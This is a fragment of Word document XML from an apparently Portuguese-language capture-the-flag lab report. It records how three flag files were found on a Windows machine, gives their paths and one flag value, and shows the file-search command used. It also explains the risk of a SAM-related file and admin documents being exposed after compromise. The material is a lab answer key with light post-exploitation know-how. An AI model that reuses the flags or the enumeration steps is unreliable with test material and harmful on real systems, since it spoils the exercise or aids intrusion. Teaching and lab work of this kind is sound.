      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> localizado em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C:\Users\Jon\Documents</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figura 21).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB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67175" cy="74295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21 – Conteúdo de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C:\Users\Jon\Documents\flag3.txt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flag{admin_documents_can_be_valuable}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C:\Users\Jon\Documents\flag3.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> exibiu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flag{admin_documents_can_be_valuable}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Este artefato simboliza a importância de diretórios pessoais de administradores, que frequentemente armazenam documentos valiosos para atacantes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF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widowControl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dbxxrvjl61pf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Varredura Completa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101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Para confirmar a existência de todas as flags, a equipe executou o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dir /b/s flag*.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figura 22). O resultado listou:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:widowControl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43300" cy="16764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22 – Comando e leitura de flags: listagem dos ficheiros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flag*.txt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C:\flag1.txt</w:t>
        <w:br w:type="textWrapping"/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C:\Windows\System32\config\flag2.txt</w:t>
        <w:br w:type="textWrapping"/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C:\Users\Jon\Documents\flag3.txt</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107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Essa varredura consolidou a descoberta dos três artefatos, reforçando como os atacantes podem automatizar buscas por arquivos sensíveis.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108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widowControl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agvc1lo4o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Interpretação</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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As evidências obtidas demonstram que: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 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirma o primeiro nível de acesso à máquina.</w:t>
        <w:br w:type="textWrapping"/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 2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> mostra que o invasor alcançou artefatos críticos ligados ao SAM Database.</w:t>
        <w:br w:type="textWrapping"/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 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> alerta sobre o valor estratégico de documentos de administradores.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E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Embora as flags sejam apenas representações seguras dentro da simulação, em um ataque real poderiam equivaler a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dados sigilosos ou credenciais exploráveis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, tornando essa etapa fundamental para compreender o risco da persistência pós-comprometimento.</w:t>
      </w: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first"/>
      <w:pgSz w:h="15840" w:w="12240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14.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jp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5.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3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